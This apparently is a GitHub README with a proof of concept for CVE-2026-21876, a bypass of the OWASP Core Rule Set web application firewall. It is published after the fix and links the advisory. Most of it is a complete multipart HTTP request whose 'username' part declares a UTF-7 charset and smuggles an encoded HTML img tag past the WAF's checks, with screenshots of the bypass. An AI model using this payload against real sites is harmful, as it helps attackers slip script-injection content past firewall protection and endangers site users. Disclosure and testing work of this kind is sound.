# CVE-2026-21876 (OWASP CRS WAF bypass)
CVE-2026-21876 docker container + minimal PoC.

I would like to thank [@airween](https://github.com/airween) and [@fzipi](https://github.com/fzipi) separately for their quick response! The vulnerability fix was ready in a very short time.
# PoC
```
POST /submit HTTP/1.1
Host: localhost
User-Agent: curl/8.17.0
Accept: */*
Origin: https://example.com
Content-Length: 367
Content-Type: multipart/form-data; boundary=------------------------cmOi6twNhVJDu76bOwDTVz

--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="username"
Content-Type: text/plain; charset=utf-7

+ADw-img+ACA-src+AD0-x+AD4-
--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="dummy"
Content-Type: text/plain; charset=utf-8

dummy
--------------------------cmOi6twNhVJDu76bOwDTVz--
```
The `username` value is not checked for characters that are not included in the whitelist, which leads to WAF bypass.
# Bypass demo
<img width="1840" height="932" alt="изображение" src="https://github.com/user-attachments/assets/163628c0-19da-4a95-bbac-c85a7b9fbd7c" />

# The same payload is blocked here
<img width="2076" height="658" alt="изображение" src="https://github.com/user-attachments/assets/1f4525d4-41a0-4d59-9538-77ac5de42caa" />

# References
- [Github security advisory](https://github.com/coreruleset/coreruleset/security/advisories/GHSA-36fv-25j3-r2c5)
- [OWASP CRS walkthrough blogpost](https://coreruleset.org/20260106/cve-2026-21876-critical-multipart-charset-bypass-fixed-in-crs-4.22.0-and-3.3.8/)